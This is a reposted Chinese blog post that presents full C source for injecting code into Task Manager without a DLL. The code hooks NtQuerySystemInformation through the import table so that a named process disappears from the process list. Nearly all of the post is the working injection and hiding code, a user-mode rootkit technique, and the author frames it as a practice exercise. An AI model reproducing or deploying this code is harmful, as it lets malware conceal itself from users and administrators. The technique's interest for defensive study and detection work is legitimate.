代码注入 API HOOK(非DLL)[转]

代码注入 API HOOK(非DLL)[转]

原文： http://blog.youkuaiyun.com/dalixux/archive/2008/10/14/3072436.aspx

使用代码注入来实现进程隐藏  而不是使用DLL注入来实现进程隐藏 
没有什么高级技术  纯体力活  原理就不说了  只是没有通过DLL注入  来实现HOOK API
从核心编程 以来  似乎 一提到C注入 就是DLL注入 很奇怪 为什么没人写个完整的代码注入
所以 自己动手写了下
纯粹注入代码   邪恶二进制上 也有个代码注入的 只是用了一个未公开的函数，我还看不懂
= =本来想用汇编写的  发现汇编注入代码远比C注入代码来的繁  所以用C实现了
主要功能就是 隐藏进程   不过RING3的似乎没多大用  练习而已
代码如下：

// 需要编译成release版本  DEBUG版本 对函数生成的跳转地址表
// jmp xxxxx  写入远程进程的时候xxxxx等于写入了一个全局变量
//  程序必然崩溃
#include  " Iat_Hook.h "


char  cPath[]  =   " taskmgr.exe " ;

void  main( void )
{
  //定义变量
  DWORD dwPid;
  HANDLE hProcess;
  DWORD dwSize = 2048;
  PVOID pRemoteAddress, pRemoteStructAddress,MyAddress;
  REMOTESTRUCT stRemoteStruct;

  //遍历进程 寻找taskmgr.exe进程ID
    dwPid = GetProcessPid(cPath);

  // open process 得到进程句柄
  hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
  if(hProcess == NULL)
  {
    printf("open error code %d\n",GetLastError());
    return;
  }
  
  //写入 替代函数
  MyAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  WriteProcessMemory(hProcess, MyAddress, myNtQuerySystemInformation, dwSize, NULL);

  //初始化结构
  InitializeStruct(&stRemoteStruct, (DWORD)MyAddress, dwPid);

  //写入结构
  pRemoteStructAddress = VirtualAllocEx(hProcess, NULL, sizeof(REMOTESTRUCT), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  WriteProcessMemory(hProcess, pRemoteStructAddress, &stRemoteStruct, sizeof(REMOTESTRUCT), NULL);

  //写入远程线程函数
  pRemoteAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  WriteProcessMemory(hProcess, pRemoteAddress, RemoteThread, dwSize, NULL);

  //创建远程线程
  CreateRemoteThread(hProcess, NULL, 0, pRemoteAddress,pRemoteStructAddress, 0, 0);
  CloseHandle(hProcess);
}

DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct)
{
  FARPROC fpVirtualQuery;
  FARPROC fpVirtualProtect;
  FARPROC fpOpenProcess;
  FARPROC fpEnum;
  FARPROC fpGetProcAddress;
  FARPROC fpLoadLibrary;
  FARPROC fpFreeLibrary;
  FARPROC fpWriteMemory;
  FARPROC fplstrcmp;

  HANDLE hProcess = NULL;
  HMODULE hMods[256];
  DWORD dwNeed;
  HANDLE hPsapi;
  MEMORY_BASIC_INFORMATION stMem;
  HMODULE hKernel, hModule;
  PIMAGE_NT_HEADERS pImageNtHeaders;
  PIMAGE_OPTIONAL_HEADER pImageOptionalHeader;
  IMAGE_DATA_DIRECTORY ImageImport;
  PIMAGE_IMPORT_DESCRIPTOR pImageImportDescriptor;
  PIMAGE_THUNK_DATA pImageThunkData;
  DWORD oldProtect;
  wchar_t *p = pRemoteStruct->cProcessName;

  //初始化函数指针
  fpVirtualQuery = (FARPROC)pRemoteStruct->dwVirtualQuery;
  fpVirtualProtect = (FARPROC)pRemoteStruct->dwVirtualProtect;
  fpOpenProcess = (FARPROC)pRemoteStruct->dwOpenProcess;
  fpLoadLibrary = (FARPROC)pRemoteStruct->dwLoadLibrary;
  fpFreeLibrary = (FARPROC)pRemoteStruct->dwFreeLibrary;
  fpGetProcAddress = (FARPROC)pRemoteStruct->dwGetProcAddress;
  fpWriteMemory = (FARPROC)pRemoteStruct->dwWriteProcessMemory;
  fplstrcmp = (FARPROC)pRemoteStruct->dwlstrcmp;

  //得到进程句柄
  hProcess =(HANDLE)fpOpenProcess(PROCESS_ALL_ACCESS, FALSE, pRemoteStruct->dwPid);
  if(!hProcess)
    return 0;

  //得到模块基址 模块基址存放于hMods[0]
  hPsapi = (HANDLE)fpLoadLibrary(pRemoteStruct->cDllName);
  fpEnum = (FARPROC)fpGetProcAddress(hPsapi, pRemoteStruct->cFunName);
  fpEnum(hProcess, hMods, sizeof(hMods), &dwNeed);
  fpFreeLibrary(hPsapi);
  hModule = hMods[0];

  //改变内存属性  因为采用的不是DLL插入 NtQuerySystemInformation的原始地址无法通过
  //全局变量传递给 替代函数 这里通过把函数地址写入kernel的PE头 来实现 这样只需要在替代函数中读出地址就可以了
  hKernel = (HANDLE)fpLoadLibrary(pRemoteStruct->cKernel);
  fpVirtualQuery(hKernel,&stMem, sizeof (MEMORY_BASIC_INFORMATION));
  fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &stMem.Protect);
  fpWriteMemory(hProcess, (PBYTE)(hKernel)+4, &pRemoteStruct->dwNtQuerySystem, sizeof(DWORD), NULL);
  fpWriteMemory(hProcess, (PBYTE)(hKernel)+8, &pRemoteStruct->dwlstrcmpW, sizeof(DWORD), NULL);
  fpWriteMemory(hProcess, (PBYTE)(hKernel)+0x14, &p, sizeof(DWORD), NULL);
  fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, &oldProtect);

  //查找导入表 找到存放NtQuerySystemInformation
  pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)*((PBYTE)hModule+0x3c) + (DWORD)hModule);
  pImageOptionalHeader = &pImageNtHeaders->OptionalHeader;
    ImageImport = pImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
  pImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(ImageImport.VirtualAddress + (DWORD)hModule);

  while(pImageImportDescriptor->Name)
  {
    if(0 == fplstrcmp(pRemoteStruct->cNtdll, (PSTR)(pImageImportDescriptor->Name + (DWORD)hModule)))
    {      
      break;
    }
    pImageImportDescriptor++;
  }
  //替换 NtQuerySystemInformation的地址
  pImageThunkData = (PIMAGE_THUNK_DATA)(pImageImportDescriptor->FirstThunk + (DWORD)hModule);
  while(pImageThunkData->u1.Function)
  {
    if(pImageThunkData->u1.Function == pRemoteStruct->dwNtQuerySystem)
    {
      fpVirtualQuery(&pImageThunkData->u1.Function, &stMem, sizeof (MEMORY_BASIC_INFORMATION));
      fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &stMem.Protect);
      pImageThunkData->u1.Function =  pRemoteStruct->dwMyAddress;
      break;
    }
    pImageThunkData++;
  }
  fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, &oldProtect);
  return 0;
}

NTSTATUS WINAPI myNtQuerySystemInformation  (
              SYSTEM_INFORMATION_CLASS SystemInformationClass,
        PVOID SystemInformation,
          ULONG SystemInformationLength,
                PULONG ReturnLength)
{
  HANDLE hKernel;
  NTSTATUS ntStatus;
  wchar_t *pName;
  PSYSTEM_PROCESS_INFORMATION pCurrent, pForward;

  FARPROC fpNtQuerySystem;
  FARPROC fplstrcmpW;

  //寻找kernel32的基址  准备读取需要用到的函数地址
  _asm 
  {
    mov eax,fs:[0x30]
    mov eax,[eax+0xc]
    mov ecx,[eax+0x1c]
    mov ecx, [ecx]
    mov eax, [ecx+8]
    mov hKernel,eax
  }
  //取得函数地址
  fpNtQuerySystem = *(FARPROC *)((DWORD)hKernel + 4);
  fplstrcmpW = *(FARPROC *)((DWORD)hKernel + 8);
  //取得 需隐藏的进程名
  pName = *(wchar_t **)((DWORD)hKernel + 0x14);

  ntStatus = (NTQUERYSYSTEMINFORMATION)fpNtQuerySystem(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
  if (SystemProcessesAndThreadsInformation == SystemInformationClass)
  {
    pForward = NULL;
    pCurrent = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
    while(pCurrent->NextEntryDelta)//检验是否到 最后一个进程结构
    {
      if(pCurrent->ProcessName.Buffer)
      {
        //_asm int 3
        if(0 == fplstrcmpW(pCurrent->ProcessName.Buffer, pName))
        {
          if(pForward)
          {
            if(pCurrent->NextEntryDelta)//隐藏的进程在链表中间              
            {
              pForward->NextEntryDelta += pCurrent->NextEntryDelta;
            }
            else//隐藏的进程在链表末端
              pForward->NextEntryDelta = 0;
          }
          else //要隐藏的进程在链表头时
          {
            if(pCurrent->NextEntryDelta)
            {
              SystemInformation = (PBYTE)pCurrent + pCurrent->NextEntryDelta;
            }
            else
              SystemInformation = NULL;
          }
        }
      }
        pForward = pCurrent;
        pCurrent = (PSYSTEM_PROCESS_INFORMATION)(pCurrent->NextEntryDelta + (PBYTE)pForward);
    }
    //_asm int 3
  }
  return ntStatus;
}


// 得到进程PID
DWORD GetProcessPid( char   * cPath)
{
  PROCESSENTRY32 stProcess;
  HANDLE hSnap;
  BOOL bRet;
  hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if(hSnap == INVALID_HANDLE_VALUE)
  {
    printf("error\n");
    return 0;
  }
  stProcess.dwSize = sizeof (PROCESSENTRY32);
  bRet = Process32First(hSnap, &stProcess);
  if(!bRet)
  {
    printf("first error\n");
    return 0;
  }
  do
  {
    if(0 == strcmp(stProcess.szExeFile, cPath)) //find  process of target
    {
      break;
    }
  }while(Process32Next(hSnap, &stProcess));

  //确认 是否找到 目标进程
  if(0 != strcmp(stProcess.szExeFile, "taskmgr.exe"))
  {
    printf("can not find process\n");
    return 0;
  }
  CloseHandle(hSnap);
  return stProcess.th32ProcessID;
}

VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid)
{
  HANDLE hNtdll;
  HANDLE hKernel;

  hNtdll = LoadLibrary("ntdll.dll");
  pRemoteStruct->dwNtQuerySystem = (DWORD)GetProcAddress(hNtdll, "NtQuerySystemInformation");
  FreeLibrary(hNtdll);

  hKernel = LoadLibrary("kernel32.dll");
  pRemoteStruct->dwVirtualProtect = (DWORD)GetProcAddress(hKernel, "VirtualProtect");
  pRemoteStruct->dwVirtualQuery = (DWORD)GetProcAddress(hKernel, "VirtualQuery");
  pRemoteStruct->dwOpenProcess = (DWORD)GetProcAddress(hKernel, "OpenProcess");
  pRemoteStruct->dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
  pRemoteStruct->dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
  pRemoteStruct->dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
  pRemoteStruct->dwWriteProcessMemory = (DWORD)GetProcAddress(hKernel, "WriteProcessMemory");
  pRemoteStruct->dwlstrcmp = (DWORD)GetProcAddress(hKernel, "lstrcmpA");
  pRemoteStruct->dwlstrcmpW = (DWORD)GetProcAddress(hKernel, "lstrcmpW");
  FreeLibrary(hKernel);
  
  pRemoteStruct->dwMyAddress = MyAddress;
  pRemoteStruct->dwPid = dwPid;
  strcpy(pRemoteStruct->cDllName, "Psapi.dll");
  strcpy(pRemoteStruct->cFunName, "EnumProcessModules");
  strcpy(pRemoteStruct->cKernel,"Kernel32.dll");
  strcpy(pRemoteStruct->cNtdll, "ntdll.dll");
        //要隐藏的进程名
  wcscpy(pRemoteStruct->cProcessName, L"explorer.exe");
}

Iat_Hook.h

// 头文件
#include  < windows.h >
#include  < stdio.h >
#include  < stdlib.h >
#include  < string .h >
#include  < tlhelp32.h >
#include  < imagehlp.h >
#include  " Winternl.h "

#pragma comment(lib,  " imagehlp " )
// 类型声明

typedef  int  NTSTATUS;
typedef BOOL (__stdcall  * ENUMPROCESSMODULES)(
            HANDLE hProcess,
            HMODULE *  lphModule,
            DWORD cb,
            LPDWORD lpcbNeeded
);

typedef NTSTATUS (WINAPI  * NTQUERYSYSTEMINFORMATION)(
            SYSTEM_INFORMATION_CLASS SystemInformationClass,
            PVOID SystemInformation,
            ULONG SystemInformationLength,
            PULONG ReturnLength
);

typedef  struct  _REMOTE_STRUCT
{
  DWORD dwNtQuerySystem;
  DWORD dwVirtualQuery;
  DWORD dwVirtualProtect;
  DWORD dwOpenProcess;
  DWORD dwMessageBox;
  DWORD dwLoadLibrary;
  DWORD dwGetProcAddress;
  DWORD dwFreeLibrary;
  DWORD dwWriteProcessMemory;
  DWORD dwlstrcmp;
  DWORD dwlstrcmpW;
  DWORD dwEnum;
  DWORD dwMyAddress;
  DWORD dwPid;
  char cDllName[50];
  char cFunName[50];
  char cKernel[50];
  char cNtdll[50];
  wchar_t cProcessName[50];//要隐藏的进程名
} REMOTESTRUCT,  * PREMOTESTRUCT;

// 函数声明
DWORD GetProcessPid( char   * cPath);
DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct);
VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid);
NTSTATUS WINAPI myNtQuerySystemInformation  (
              SYSTEM_INFORMATION_CLASS SystemInformationClass,
        PVOID SystemInformation,
          ULONG SystemInformationLength,
                PULONG ReturnLength);

Winternl.h

typedef  struct  _UNICODE_STRING  { 
  USHORT Length; 
  USHORT MaximumLength; 
  PWSTR  Buffer;                 //注意，这里为Unicode类型
}  UNICODE_STRING,  * PUNICODE_STRING;

typedef  enum  _SYSTEM_INFORMATION_CLASS  {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
}  SYSTEM_INFORMATION_CLASS;

typedef  struct  _SYSTEM_PROCESS_INFORMATION  
{  
    DWORD NextEntryDelta;  
    DWORD dThreadCount;  
    DWORD dReserved01;  
    DWORD dReserved02;  
    DWORD dReserved03;  
    DWORD dReserved04;  
    DWORD dReserved05;  
    DWORD dReserved06;  
    FILETIME ftCreateTime; /**//* relative to 01-01-1601 */  
    FILETIME ftUserTime; /**//* 100 nsec units */  
    FILETIME ftKernelTime; /**//* 100 nsec units */  
    UNICODE_STRING ProcessName;      //这就是进程名
    DWORD BasePriority;  
    DWORD dUniqueProcessId;            //进程ID
    DWORD dParentProcessID;  
    DWORD dHandleCount;  
    DWORD dReserved07;  
    DWORD dReserved08;  
    DWORD VmCounters;  
    DWORD dCommitCharge;  
    PVOID ThreadInfos[1]; 
}  SYSTEM_PROCESS_INFORMATION,  * PSYSTEM_PROCESS_INFORMATION;

后记：第一次没有照着书 打代码 也找不到C 注入代码的例子 能找到的都是DLL注入原理早就知道了 真的写一遍 不容易 整个编写的过程 碰到了很多问题 最终都解决了 轻松了

 

posted on 2008-10-14 13:36 greatws 阅读(3155) 评论(2)   编辑  收藏 引用